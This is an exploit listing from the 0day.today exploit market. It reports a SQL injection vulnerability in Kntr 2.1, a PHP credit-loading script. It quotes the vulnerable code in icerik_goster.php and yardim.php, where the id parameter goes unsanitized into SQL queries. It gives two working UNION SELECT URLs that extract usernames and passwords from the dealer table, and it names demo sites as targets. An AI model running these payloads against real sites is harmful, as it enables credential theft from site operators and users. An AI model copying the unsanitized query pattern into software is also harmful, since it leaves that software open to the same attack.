[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kntr 2.1(Private) - Blind SQL Injection Vulnerability

Author
KnocKout
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13909
Category
web applications
Date add
30-08-2010
Platform
php
=====================================================
Kntr 2.1(Private) - Blind SQL Injection Vulnerability
=====================================================


#################################################
Author : KnocKout
Thankz : DaiMon,BARCOD3
Contact : knockoutr@msn.com
Sayz : "Biz Raporlarэzda.. Fakat Siz Siz Olun Ayэk olun.."
#################################################
Script : Kntr - (Parзa Kontцr Sistemleri)
Version : 2.1
Script Page : http://www.kntr.org/
Dork : N/A
Vulnerable Files : icerik_goster.php,yardim.php
################################################
Demo : http://www.kontor.us
Demo: http://www.kontormakinesi.net
###############################################
############ Error Line in 'icerik_goster.php' ###########
..
<?PHP
if (isset($_GET['id']))
{?>
<div class="baslik"><span class="style1"><?PHP echo(sqlresult('SELECT title FROM simplenews_articles WHERE news_id=' .$_GET['id']));?></span></div>
<div class="metin">
<?PHP echo(sqlresult('SELECT article FROM simplenews_articles WHERE news_id=' .$_GET['id']));?>
<br /><br />
</div>
<?PHP } ?>
</body>
</html>
..
###########################################################
############# Error Line in 'yardim.php' #################
..
<?php 
$id=$_GET['id'];
$baslik=sqlresult('SELECT baslik FROM yardim WHERE id='.$id);
...
##########################################################
Inject to ()by SQL : icerik_goster.php?id=50+union+select+concat%28isim,0x3a,sifre%29+from+bayi+where+bayiid=7
Inject to ()by SQL : yardim.php?id=50+union+select+concat%28isim,0x3a,sifre%29+from+bayi+where+bayiid=7
############################################################



#  0day.today [2024-12-26]  #